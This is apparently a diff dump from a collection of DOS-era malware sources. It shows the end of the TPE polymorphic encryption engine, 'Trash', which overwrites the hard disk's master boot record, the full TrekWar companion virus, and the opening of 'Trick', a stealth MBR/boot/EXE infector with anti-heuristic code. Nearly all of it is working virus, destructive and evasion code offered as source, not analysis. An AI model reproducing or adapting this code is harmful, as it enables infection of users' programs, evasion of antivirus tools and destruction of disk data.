stosb ;same instruction again
|
||||
return: ret
|
||||
|
||||
add1: test bh,40 ;ADD/SUB
|
||||
jz no_clc2 ;carry?
|
||||
mov al,0F8 ;insert CLC
|
||||
stosb
|
||||
no_clc2: mov al,083
|
||||
stosb
|
||||
mov al,0C0
|
||||
test bh,1 ;up or down?
|
||||
jz add2
|
||||
mov al,0E8
|
||||
add2: test bh,40 ;carry?
|
||||
jz no_ac2
|
||||
and al,0CF
|
||||
or al,10
|
||||
no_ac2: call add_ind
|
||||
stosb
|
||||
mov al,1 ;value to add/sub
|
||||
save_it: call add_1
|
||||
stosb
|
||||
ret
|
||||
|
||||
do_cmpsw: test bh,1 ;up or down?
|
||||
jz no_std
|
||||
mov al,0FDh ;insert STD
|
||||
stosb
|
||||
no_std: test bh,4 ;CMPSW or SCASW?
|
||||
jz normal_cmpsw
|
||||
test bl,4 ;no SCASW if SI is used
|
||||
jnz do_scasw
|
||||
|
||||
normal_cmpsw: mov al,0A6 ;CMPSB
|
||||
jmp short save_it
|
||||
do_scasw: mov al,0AE ;SCASB
|
||||
jmp short save_it
|
||||
|
||||
|
||||
;****************************************************************************
|
||||
;* generate loop command
|
||||
;****************************************************************************
|
||||
|
||||
do_loop: test bh,1 ;no JNE if couting down
|
||||
jnz loop_loop ; (prefetch bug!)
|
||||
call rnd_get
|
||||
test al,1 ;LOOPNZ/LOOP or JNE?
|
||||
jnz cx_loop
|
||||
|
||||
loop_loop: mov al,0E0
|
||||
test bh,1A ;LOOPNZ or LOOP?
|
||||
jz ll0 ; no LOOPNZ if xor-offset
|
||||
add al,2 ; no LOOPNZ if CMPSW/SCASW
|
||||
ll0: stosb
|
||||
mov ax,dx
|
||||
sub ax,di
|
||||
dec ax
|
||||
stosb
|
||||
ret
|
||||
|
||||
cx_loop: test bh,10 ;SUB CX or DEC CX?
|
||||
jnz cxl_dec
|
||||
mov ax,0E983
|
||||
stosw
|
||||
mov al,1
|
||||
stosb
|
||||
jmp short do_jne
|
||||
|
||||
cxl_dec: mov al,49
|
||||
stosb
|
||||
do_jne: mov al,75
|
||||
jmp short ll0
|
||||
|
||||
|
||||
;****************************************************************************
|
||||
;* add value to AL depending on register type
|
||||
;****************************************************************************
|
||||
|
||||
add_dir: mov si,offset dir_change
|
||||
jmp short xx1
|
||||
|
||||
add_ind: mov si,offset ind_change
|
||||
xx1: push bx
|
||||
shr bl,1
|
||||
shr bl,1
|
||||
and bx,3
|
||||
add al,byte ptr ds:[bx+si]
|
||||
pop bx
|
||||
ret
|
||||
|
||||
|
||||
;****************************************************************************
|
||||
;* mov encryption command byte to AL
|
||||
;****************************************************************************
|
||||
|
||||
get_xor: push bx
|
||||
mov ax,offset how_mode
|
||||
xchg ax,bx
|
||||
and ax,3
|
||||
xlat
|
||||
pop bx
|
||||
ret
|
||||
|
||||
|
||||
;****************************************************************************
|
||||
;* change ADD into ADC
|
||||
;****************************************************************************
|
||||
|
||||
do_carry: test bl,2 ;ADD/SUB used for encryption?
|
||||
jz no_ac
|
||||
test bh,20 ;carry with (encr.) ADD/SUB?
|
||||
jz no_ac
|
||||
and al,0CF
|
||||
or al,10
|
||||
no_ac: ret
|
||||
|
||||
|
||||
;****************************************************************************
|
||||
;* change AL (byte/word)
|
||||
;****************************************************************************
|
||||
|
||||
add_1: test bl,10
|
||||
jz add_1_ret
|
||||
inc al
|
||||
add_1_ret: ret
|
||||
|
||||
|
||||
;****************************************************************************
|
||||
;* change AL (byte/word)
|
||||
;****************************************************************************
|
||||
|
||||
maybe_2: call add_1
|
||||
cmp al,81 ;can't touch this
|
||||
je maybe_not
|
||||
push ax
|
||||
call rnd_get
|
||||
test al,1
|
||||
pop ax
|
||||
jz maybe_not
|
||||
add al,2
|
||||
maybe_not: ret
|
||||
|
||||
|
||||
;****************************************************************************
|
||||
;* get random nop (or not)
|
||||
;****************************************************************************
|
||||
|
||||
do_nop: test byte ptr ds:[flags],2
|
||||
jz no_nop
|
||||
yes_nop: call rnd_get
|
||||
test al,3
|
||||
jz nop8
|
||||
test al,2
|
||||
jz nop16
|
||||
test al,1
|
||||
jz nop16x
|
||||
no_nop: ret
|
||||
|
||||
|
||||
;****************************************************************************
|
||||
;* Insert random instructions
|
||||
;****************************************************************************
|
||||
|
||||
do_junk: test byte ptr ds:[flags],4
|
||||
jz no_junk
|
||||
call rnd_get ;put a random number of
|
||||
and ax,0F ; dummy instructions before
|
||||
inc ax ; decryptor
|
||||
xchg ax,cx
|
||||
junk_loop: call junk
|
||||
loop junk_loop
|
||||
no_junk: ret
|
||||
|
||||
|
||||
;****************************************************************************
|
||||
;* get rough random nop (may affect register values)
|
||||
;****************************************************************************
|
||||
|
||||
junk: call rnd_get
|
||||
and ax,1E
|
||||
jmp short aa0
|
||||
nop16x: call rnd_get
|
||||
and ax,06
|
||||
aa0: xchg ax,si
|
||||
call rnd_get
|
||||
jmp word ptr ds:[si+junkcals]
|
||||
|
||||
|
||||
;****************************************************************************
|
||||
;* NOP and junk addresses
|
||||
;****************************************************************************
|
||||
|
||||
junkcals dw offset nop16x0
|
||||
dw offset nop16x1
|
||||
dw offset nop16x2
|
||||
dw offset nop16x3
|
||||
dw offset nop8
|
||||
dw offset nop16
|
||||
dw offset junk6
|
||||
dw offset junk7
|
||||
dw offset junk8
|
||||
dw offset junk9
|
||||
dw offset junkA
|
||||
dw offset junkB
|
||||
dw offset junkC
|
||||
dw offset junkD
|
||||
dw offset junkE
|
||||
dw offset junkF
|
||||
|
||||
|
||||
;****************************************************************************
|
||||
;* NOP and junk routines
|
||||
;****************************************************************************
|
||||
|
||||
nop16x0: and ax,000F ;J* 0000 (conditional)
|
||||
or al,70
|
||||
stosw
|
||||
ret
|
||||
|
||||
|
||||
nop16x1: mov al,0EBh ;JMP xxxx / junk
|
||||
and ah,07
|
||||
inc ah
|
||||
stosw
|
||||
xchg al,ah ;get lenght of bullshit
|
||||
cbw
|
||||
jmp fill_bullshit
|
||||
|
||||
|
||||
nop16x2: call junkD ;XCHG AX,reg / XCHG AX,reg
|
||||
stosb
|
||||
ret
|
||||
|
||||
|
||||
nop16x3: call junkF ;INC / DEC or DEC / INC
|
||||
xor al,8
|
||||
stosb
|
||||
ret
|
||||
|
||||
|
||||
nop8: push bx ;8-bit NOP
|
||||
and al,7
|
||||
mov bx,offset nop_data8
|
||||
xlat
|
||||
stosb
|
||||
pop bx
|
||||
ret
|
||||
|
||||
|
||||
nop16: push bx ;16-bit NOP
|
||||
and ax,0303
|
||||
mov bx,offset nop_data16
|
||||
xlat
|
||||
add al,ah
|
||||
stosb
|
||||
call rnd_get
|
||||
and al,7
|
||||
mov bl,9
|
||||
mul bl
|
||||
add al,0C0
|
||||
stosb
|
||||
pop bx
|
||||
ret
|
||||
|
||||
|
||||
junk6: push cx ;CALL xxxx / junk / POP reg
|
||||
mov al,0E8
|
||||
and ah,0F
|
||||
inc ah
|
||||
stosw
|
||||
xor al,al
|
||||
stosb
|
||||
xchg al,ah
|
||||
call fill_bullshit
|
||||
call do_nop
|
||||
call rnd_get ;insert POP reg
|
||||
and al,7
|
||||
call no_sp
|
||||
mov cx,ax
|
||||
or al,58
|
||||
stosb
|
||||
|
||||
test ch,3 ;more?
|
||||
jnz junk6_ret
|
||||
|
||||
call do_nop
|
||||
mov ax,0F087 ;insert XCHG SI,reg
|
||||
or ah,cl
|
||||
test ch,8
|
||||
jz j6_1
|
||||
mov al,8Bh
|
||||
j6_1: stosw
|
||||
|
||||
call do_nop
|
||||
push bx
|
||||
call rnd_get
|
||||
xchg ax,bx
|
||||
and bx,0F7FBh ;insert XOR [SI],xxxx
|
||||
or bl,8
|
||||
call do_xor
|
||||
pop bx
|
||||
junk6_ret: pop cx
|
||||
ret
|
||||
|
||||
|
||||
junk7: and al,0F ;MOV reg,xxxx
|
||||
or al,0B0
|
||||
call no_sp
|
||||
stosb
|
||||
test al,8
|
||||
pushf
|
||||
call rnd_get
|
||||
popf
|
||||
jmp short byte_word
|
||||
|
||||
|
||||
junk8: and ah,39 ;DO r/m,r(8/16)
|
||||
or al,0C0
|
||||
call no_sp
|
||||
xchg al,ah
|
||||
stosw
|
||||
ret
|
||||
|
||||
|
||||
junk9: and al,3Bh ;DO r(8/16),r/m
|
||||
or al,2
|
||||
and ah,3F
|
||||
call no_sp2
|
||||
call no_bp
|
||||
stosw
|
||||
ret
|
||||
|
||||
|
||||
junkA: and ah,1 ;DO rm,xxxx
|
||||
or ax,80C0
|
||||
call no_sp
|
||||
xchg al,ah
|
||||
stosw
|
||||
test al,1
|
||||
pushf
|
||||
call rnd_get
|
||||
popf
|
||||
jmp short byte_word
|
||||
|
||||
|
||||
junkB: call nop8 ;NOP / LOOP
|
||||
mov ax,0FDE2
|
||||
stosw
|
||||
ret
|
||||
|
||||
|
||||
junkC: and al,09 ;CMPS* or SCAS*
|
||||
test ah,1
|
||||
jz mov_test
|
||||
or al,0A6
|
||||
stosb
|
||||
ret
|
||||
mov_test: or al,0A0 ;MOV AX,[xxxx] or TEST AX,xxxx
|
||||
stosb
|
||||
cmp al,0A8
|
||||
pushf
|
||||
call rnd_get
|
||||
popf
|
||||
jmp short byte_word
|
||||
|
||||
|
||||
junkD: and al,07 ;XCHG AX,reg
|
||||
or al,90
|
||||
call no_sp
|
||||
stosb
|
||||
ret
|
||||
|
||||
|
||||
junkE: and ah,07 ;PUSH reg / POP reg
|
||||
or ah,50
|
||||
mov al,ah
|
||||
or ah,08
|
||||
stosw
|
||||
ret
|
||||
|
||||
|
||||
junkF: and al,0F ;INC / DEC
|
||||
or al,40
|
||||
call no_sp
|
||||
stosb
|
||||
ret
|
||||
|
||||
|
||||
;****************************************************************************
|
||||
;* store a byte or a word
|
||||
;****************************************************************************
|
||||
|
||||
byte_word: jz only_byte
|
||||
stosw
|
||||
ret
|
||||
|
||||
only_byte: stosb
|
||||
ret
|
||||
|
||||
|
||||
;****************************************************************************
|
||||
;* don't fuck with SP!
|
||||
;****************************************************************************
|
||||
|
||||
no_sp: push ax
|
||||
and al,7
|
||||
cmp al,4
|
||||
pop ax
|
||||
jnz no_sp_ret
|
||||
and al,0FBh
|
||||
no_sp_ret: ret
|
||||
|
||||
|
||||
;****************************************************************************
|
||||
;* don't fuck with SP!
|
||||
;****************************************************************************
|
||||
|
||||
no_sp2: push ax
|
||||
and ah,38
|
||||
cmp ah,20
|
||||
pop ax
|
||||
jnz no_sp2_ret
|
||||
xor ah,20
|
||||
no_sp2_ret: ret
|
||||
|
||||
|
||||
;****************************************************************************
|
||||
;* don't use [BP+..]
|
||||
;****************************************************************************
|
||||
|
||||
no_bp: test ah,4
|
||||
jnz no_bp2
|
||||
and ah,0FDh
|
||||
ret
|
||||
|
||||
no_bp2: push ax
|
||||
and ah,7
|
||||
cmp ah,6
|
||||
pop ax
|
||||
jnz no_bp_ret
|
||||
or ah,1
|
||||
no_bp_ret: ret
|
||||
|
||||
|
||||
;****************************************************************************
|
||||
;* write byte for JMP/CALL and fill with random bullshit
|
||||
;****************************************************************************
|
||||
|
||||
fill_bullshit: push cx
|
||||
xchg ax,cx
|
||||
bull_lup: call rnd_get
|
||||
stosb
|
||||
loop bull_lup
|
||||
pop cx
|
||||
ret
|
||||
|
||||
|
||||
;****************************************************************************
|
||||
;* random number generator (stolen from 'Bomber')
|
||||
;****************************************************************************
|
||||
|
||||
rnd_init: push cx
|
||||
call rnd_init0 ;init
|
||||
and ax,000F
|
||||
inc ax
|
||||
xchg ax,cx
|
||||
random_lup: call rnd_get ;call random routine a few
|
||||
loop random_lup ; times to 'warm up'
|
||||
pop cx
|
||||
ret
|
||||
|
||||
rnd_init0: push dx ;initialize generator
|
||||
push cx
|
||||
mov ah,2C
|
||||
int 21
|
||||
in al,40
|
||||
mov ah,al
|
||||
in al,40
|
||||
xor ax,cx
|
||||
xor dx,ax
|
||||
jmp short move_rnd
|
||||
|
||||
rnd_get: push dx ;calculate a random number
|
||||
push cx
|
||||
push bx
|
||||
mov ax,0 ;will be: mov ax,xxxx
|
||||
mov dx,0 ; and mov dx,xxxx
|
||||
mov cx,7
|
||||
rnd_lup: shl ax,1
|
||||
rcl dx,1
|
||||
mov bl,al
|
||||
xor bl,dh
|
||||
jns rnd_l2
|
||||
inc al
|
||||
rnd_l2: loop rnd_lup
|
||||
pop bx
|
||||
|
||||
move_rnd: mov word ptr ds:[rnd_get+4],ax
|
||||
mov word ptr ds:[rnd_get+7],dx
|
||||
mov al,dl
|
||||
pop cx
|
||||
pop dx
|
||||
ret
|
||||
|
||||
|
||||
;****************************************************************************
|
||||
;* tables for engine
|
||||
;****************************************************************************
|
||||
|
||||
; AX AL AH (BX) BL BH CX CL CH
|
||||
mov_byte db 0B8, 0B0, 0B4, 0, 0B8, 0B3, 0B7, 0, 0B9, 0B1, 0B5
|
||||
|
||||
; nop clc stc cmc cli cld incbp decbp
|
||||
nop_data8 db 90, 0F8, 0F9, 0F5, 0FA, 0FC, 45, 4Dh
|
||||
|
||||
; or and xchg mov
|
||||
nop_data16 db 8, 20, 84, 88
|
||||
|
||||
; bl/bh, bx, si di
|
||||
dir_change db 07, 07, 04, 05
|
||||
ind_change db 03, 03, 06, 07
|
||||
|
||||
|
||||
; xor xor add sub
|
||||
how_mode db 30, 30, 00, 28
|
||||
|
||||
; ? add xor or
|
||||
add_mode db 0, 0C8, 0F0, 0C0
|
||||
|
||||
tpe_bottom equ $
|
||||
|
||||
end TPE12
|
File diff suppressed because it is too large
Load Diff
File diff suppressed because it is too large
Load Diff
File diff suppressed because it is too large
Load Diff
|
@ -0,0 +1,169 @@
|
|||
page ,132
|
||||
title Trash - smashes the boot record on the first hard disk
|
||||
name TRASH
|
||||
|
||||
.radix 16
|
||||
|
||||
code segment
|
||||
assume cs:code,ds:code
|
||||
|
||||
org 100
|
||||
|
||||
CODEX equ 0C000 ; Or use 0300 when tracing DOS
|
||||
|
||||
CR equ 0Dh
|
||||
LF equ 0A
|
||||
|
||||
start:
|
||||
jmp do_it
|
||||
|
||||
oldint1 dd ?
|
||||
newintx dd ?
|
||||
oldintx dd ?
|
||||
trace db 1
|
||||
found db 0
|
||||
buffer db 200 dup (0)
|
||||
message db CR,LF,'********** W A R N I N G ! ! ! **********',CR,LF,CR,LF
|
||||
db 'This program, when run, will zero (DESTROY!) the',CR,LF
|
||||
db 'master boot record of your first hard disk.',CR,LF,CR,LF
|
||||
db 'The purpose of this is to test the antivirus software,',CR,LF
|
||||
db 'so be sure you have installed your favourite',CR,LF
|
||||
db 'protecting program before running this one!',CR,LF
|
||||
db "(It's almost sure it will fail to protect you anyway!)",CR,LF
|
||||
db CR,LF,'Press any key to abort, or',CR,LF
|
||||
db 'press Ctrl-Alt-RightShift-F5 to proceed (at your own risk!) $'
|
||||
warned db CR,LF,CR,LF,'Allright, you were warned!',CR,LF,'$'
|
||||
|
||||
do_it:
|
||||
mov ax,600 ; Clear the screen by scrolling it up
|
||||
mov bh,7
|
||||
mov dx,1950
|
||||
xor cx,cx
|
||||
int 10
|
||||
|
||||
mov ah,0F ; Get the current video mode
|
||||
int 10 ; (the video page, more exactly)
|
||||
|
||||
mov ah,2 ; Home the cursor
|
||||
xor dx,dx
|
||||
int 10
|
||||
|
||||
mov ah,9 ; Print a warning message
|
||||
mov dx,offset message
|
||||
int 21
|
||||
|
||||
mov ax,0C08 ; Flush the keyboard and get a char
|
||||
int 21
|
||||
cmp al,0 ; Extendet ASCII?
|
||||
jne quit1 ; Exit if not
|
||||
mov ah,8 ; Get the key code
|
||||
int 21
|
||||
cmp al,6C ; Shift-F5?
|
||||
jne quit1 ; Exit if not
|
||||
mov ah,2 ; Get keyboard shift status
|
||||
int 16
|
||||
and al,1101b ; Ctrl-Alt-RightShift?
|
||||
jnz proceed ; Proceed if so
|
||||
quit1:
|
||||
jmp quit ; Otherwise exit
|
||||
|
||||
proceed:
|
||||
mov ah,9 ; Print the last message
|
||||
mov dx,offset warned
|
||||
int 21
|
||||
|
||||
mov ax,3501 ; Get interrupt vector 1 (single steping)
|
||||
int 21
|
||||
mov word ptr oldint1,bx
|
||||
mov word ptr oldint1+2,es
|
||||
|
||||
mov ax,2501 ; Set new INT 1 handler
|
||||
mov dx,offset newint1
|
||||
int 21
|
||||
|
||||
mov ax,3513 ; Get interrupt vector 13
|
||||
int 21
|
||||
mov word ptr oldintx,bx
|
||||
mov word ptr oldintx+2,es
|
||||
mov word ptr newintx,bx
|
||||
mov word ptr newintx+2,es
|
||||
|
||||
; The following code is sacred in it's present form.
|
||||
; To change it would cause volcanos to errupt,
|
||||
; the ground to shake, and program not to run!
|
||||
|
||||
mov ax,200
|
||||
push ax
|
||||
push cs
|
||||
mov ax,offset done
|
||||
push ax
|
||||
mov ax,100
|
||||
push ax
|
||||
push cs
|
||||
mov ax,offset faddr
|
||||
push ax
|
||||
mov ah,55
|
||||
iret
|
||||
|
||||
assume ds:nothing
|
||||
|
||||
faddr:
|
||||
jmp oldintx
|
||||
|
||||
newint1:
|
||||
push bp
|
||||
mov bp,sp
|
||||
cmp trace,0
|
||||
jne search
|
||||
exit:
|
||||
and [bp+6],not 100
|
||||
exit1:
|
||||
pop bp
|
||||
iret
|
||||
search:
|
||||
cmp [bp+4],CODEX
|
||||
jb exit1
|
||||
;Or use ja if you want to trace DOS-owned interrupt
|
||||
push ax
|
||||
mov ax,[bp+4]
|
||||
mov word ptr newintx+2,ax
|
||||
mov ax,[bp+2]
|
||||
mov word ptr newintx,ax
|
||||
pop ax
|
||||
mov found,1
|
||||
mov trace,0
|
||||
jmp exit
|
||||
|
||||
assume ds:code
|
||||
done:
|
||||
mov trace,0
|
||||
push ds
|
||||
mov ax,word ptr oldint1+2
|
||||
mov dx,word ptr oldint1
|
||||
mov ds,ax
|
||||
mov ax,2501 ; Restore old INT 1 handler
|
||||
int 21
|
||||
pop ds
|
||||
|
||||
; Code beyong this point is not sacred...
|
||||
; It may be perverted in any manner by any pervert.
|
||||
|
||||
cmp found,1 ; See if original INT 13 handler found
|
||||
jne quit ; Exit if not
|
||||
push ds
|
||||
pop es ; Restore ES
|
||||
|
||||
mov ax,301 ; Write 1 sector
|
||||
mov cx,1 ; Cylinder 0, sector 1
|
||||
mov dx,80 ; Head 0, drive 80h
|
||||
mov bx,offset buffer
|
||||
pushf ; Simulate INT 13
|
||||
call newintx ; Do it
|
||||
|
||||
quit:
|
||||
mov ax,4C00 ; Exit program
|
||||
int 21
|
||||
|
||||
code ends
|
||||
end start
|
||||
|
|
@ -0,0 +1,185 @@
|
|||
;TREKWAR virus - we were overjoyed at Crypt Newsletter when Goose showed
|
||||
;us his update of CloneWar, TrekWar. Alert readers will remember ACME,
|
||||
;the musical companion based on ZENO, a relative of CloneWar.
|
||||
;So here it is!
|
||||
;TrekWar
|
||||
;ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
|
||||
;³ Assembly Source Listing for TrekWar Companion Virus ³
|
||||
;³ Copyright (c) 1993 T.R.E.K. All Rights Reserved. :) ³
|
||||
;ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
|
||||
;³ The TrekWar is a simple modification of the Clonewar V2 companion virus; ³
|
||||
;³ for all you trekkers out there... For those of you who, heaven forbid, do ³
|
||||
;³ not know what the words below mean, they are the words to the old series ³
|
||||
;³ opening music of Star Trek... ³
|
||||
;ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
|
||||
|
||||
CSEG SEGMENT
|
||||
ASSUME CS:CSEG,DS:NOTHING
|
||||
|
||||
ORG 100H
|
||||
|
||||
START:
|
||||
jmp VIR_BEGIN ;lets get moving...
|
||||
|
||||
db "",13,10
|
||||
db "",13,10
|
||||
db "Beyond",13,10 ;blah blah blah
|
||||
db "The rim of the star-light",13,10
|
||||
db "My love",13,10
|
||||
db "Is wand'ring in star-flight",13,10
|
||||
db "I know",13,10
|
||||
db "He'll find in star-clustered reaches",13,10
|
||||
db "Love",13,10
|
||||
db "Strange love a star woman teaches.",13,10
|
||||
db "I know",13,10
|
||||
db "His journey ends never",13,10
|
||||
db "His star trek",13,10
|
||||
db "Will go on forever.",13,10
|
||||
db "But tell him",13,10
|
||||
db "While he wanders his starry sea",13,10
|
||||
db "Remember, remember me."
|
||||
db "",13,10
|
||||
db "",13,10
|
||||
|
||||
db "[TrekWar] " ;what the heck, its only a few bytes!?
|
||||
WILDCARD DB "*.EXE",0
|
||||
FILE_EXT DB "COM",0
|
||||
FILE_FOUND DB 12 DUP(' '), 0
|
||||
FILE_CREATE DB 12 DUP(' '), 0
|
||||
SEARCH_ATTRIB DW 17H
|
||||
NUM_INFECT DW 0
|
||||
|
||||
|
||||
My_Cmd:
|
||||
CMD_LEN DB 13
|
||||
FILE_CLONE DB 12 DUP (' '), 0
|
||||
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
; Read all the directory filenames and store as records in buffer.
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
||||
Vir_begin:
|
||||
|
||||
mov sp,offset STACK_HERE ;move stack down
|
||||
mov bx,sp
|
||||
add bx,15
|
||||
mov cl,4
|
||||
shr bx,cl
|
||||
mov ah,4ah ;deallocate rest of memory
|
||||
int 21h
|
||||
|
||||
mov di,OFFSET FILE_CLONE ;Point to buffer.
|
||||
mov si,OFFSET FILE_FOUND
|
||||
mov cx,12
|
||||
rep movsb
|
||||
|
||||
Read_dir: mov dx,OFFSET WILDCARD ;file mask for directory search
|
||||
mov cx,SEARCH_ATTRIB
|
||||
|
||||
mov ah,4Eh ;find first matching file
|
||||
int 21h
|
||||
|
||||
jc EXIT ;If empty directory, exit
|
||||
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
||||
Store_name:
|
||||
|
||||
mov di,OFFSET FILE_FOUND ;Point to buffer.
|
||||
mov si,158 ;stow the file found in buffer
|
||||
mov cx,12
|
||||
rep movsb
|
||||
|
||||
mov di,OFFSET FILE_CREATE ;Point to buffer.
|
||||
mov si,158
|
||||
mov cx,12
|
||||
rep movsb
|
||||
|
||||
cld
|
||||
mov di,OFFSET FILE_CREATE
|
||||
mov al,'.'
|
||||
mov cx,9
|
||||
repne scasb ;find the '.'
|
||||
|
||||
mov si,OFFSET FILE_EXT
|
||||
mov cx,3
|
||||
rep movsb ;replace the .EXE with .COM
|
||||
;from buffer
|
||||
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
||||
Check_file: ;does the file exist?
|
||||
mov dx,OFFSET FILE_CREATE
|
||||
xor cx,cx
|
||||
mov ax,3d00h ;Open file, read only
|
||||
int 21h
|
||||
jnc find_next
|
||||
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
Infect_file: ;create companion routine
|
||||
|
||||
mov dx,OFFSET FILE_CREATE ;contains name of "companion"
|
||||
xor cx,cx
|
||||
mov ah,3ch ;construct file
|
||||
int 21h
|
||||
jc EXIT
|
||||
|
||||
;Write virus to companion file
|
||||
xchg bx,ax
|
||||
mov cx,(OFFSET END_OF_CODE - OFFSET START) ;virus length
|
||||
mov dx,OFFSET START
|
||||
mov ah,40h ;write to file function
|
||||
int 21h ;do it
|
||||
|
||||
;Close file
|
||||
mov ah,3eh ;assumes bx still has file handle
|
||||
int 21h
|
||||
|
||||
;Change attributes
|
||||
mov dx,OFFSET FILE_CREATE ;of created file to
|
||||
mov cx,3 ;(1) read only and (2) hidden
|
||||
mov ax,4301h
|
||||
int 21h
|
||||
jmp prepare_command
|
||||
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
;...findnext...
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
find_next:
|
||||
mov ah, 4fh ;find next...
|
||||
int 21h
|
||||
jmp store_name
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
Prepare_command:
|
||||
|
||||
cld
|
||||
mov di,OFFSET FILE_CLONE
|
||||
mov al,0
|
||||
mov cx,12
|
||||
repne scasb ;find the end of string \0
|
||||
|
||||
mov al,0Dh ;<CR>
|
||||
stosb ;replace \0 with a <CR>
|
||||
|
||||
mov ax,12 ;store length of the command
|
||||
sub ax,cx
|
||||
mov CMD_LEN, al
|
||||
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
||||
Exit:
|
||||
;Run the original program
|
||||
mov si, OFFSET MY_CMD
|
||||
int 2Eh ;Pass command to command
|
||||
;interpreter for execution
|
||||
mov ax,4C00H ;Exit to DOS
|
||||
int 21h
|
||||
|
||||
|
||||
END_OF_CODE = $
|
||||
|
||||
STACK_HERE EQU END_OF_CODE + 512
|
||||
|
||||
CSEG ENDS
|
||||
END START
|
||||
|
File diff suppressed because it is too large
Load Diff
|
@ -0,0 +1,255 @@
|
|||
; Trick Virii (446 bytes length!)
|
||||
; (l) 1997 copyleft by Psychomancer // SPS.
|
||||
; 2:454/7.64@FidoNet
|
||||
|
||||
; MBR/BOOT/EXE stealth hard-removable infector.
|
||||
; Thanx 2 Nutcracker 4 "cryp_sec" algorithm.
|
||||
|
||||
; WARNING! 4 compile tasm /m option needed!
|
||||
; DON'T RUN IT! ONLY 4 DEMONSTRATION!
|
||||
|
||||
model tiny
|
||||
.code
|
||||
|
||||
begin: mov cx,decryp_len
|
||||
call $+3
|
||||
xor ah,ah
|
||||
int 15h ; antiheuristic trick (must b CF=1 on return)
|
||||
pop si
|
||||
sbb al,al ; <- set AL in zero manual on 1st execute!
|
||||
; (in DEBUG)
|
||||
lea di,[si+decryp_begin-6]
|
||||
xor_decryp: sub al,0
|
||||
xor_mask equ $-begin-1
|
||||
xor cs:[di],al ; decrypt selfbody
|
||||
inc di
|
||||
loop xor_decryp
|
||||
decryp_begin equ $-begin
|
||||
decryp_code: sub si,6
|
||||
jz file_start ; goto if run from file
|
||||
mov bx,7c00h
|
||||
xor di,di
|
||||
mov ds,di
|
||||
mov ss,di
|
||||
mov sp,bx
|
||||
dec word ptr ds:[413h] ; decrease TOM
|
||||
mov ax,[di+3*4]
|
||||
mov [si+rom_mask],ax ; store crypt mask
|
||||
int 12h
|
||||
mov cx,206h
|
||||
mov [si+offrand],ch ; set in 2
|
||||
shl ax,cl
|
||||
mov es,ax
|
||||
push ss bx
|
||||
rep movsb ; move selfbody 2 new segm
|
||||
push es
|
||||
mov es,cx
|
||||
mov cl,go_after_move
|
||||
push cx
|
||||
retf
|
||||
|
||||
;-----------------------------------------------;
|
||||
|
||||
file_start: mov ax,0deadh
|
||||
int 13h ; we present in memory?
|
||||
jnc file_exit
|
||||
mov ah,13h
|
||||
int 2fh
|
||||
mov ax,259ah
|
||||
int 21h ; set int 9ah on ROM int 13h
|
||||
mov ah,13h
|
||||
int 2fh
|
||||
push cs
|
||||
pop es
|
||||
mov ax,1600h
|
||||
int 2fh
|
||||
cmp ax,1600h ; we execute under windoze?
|
||||
mov al,0
|
||||
org $-1
|
||||
jnc $ ; no - will b crypt direntries
|
||||
org $-1
|
||||
je no_win_run
|
||||
mov al,0
|
||||
org $-1
|
||||
jmp $ ; yeah - no crypt direntries
|
||||
org $-1
|
||||
no_win_run: mov cs:cryp_switch,al ; store it
|
||||
lea bx,buffer
|
||||
call copy_2_mbr ; infect mbr on 1st hd
|
||||
file_exit: .exit
|
||||
|
||||
;-----------------------------------------------;
|
||||
|
||||
go_after_move equ $-begin
|
||||
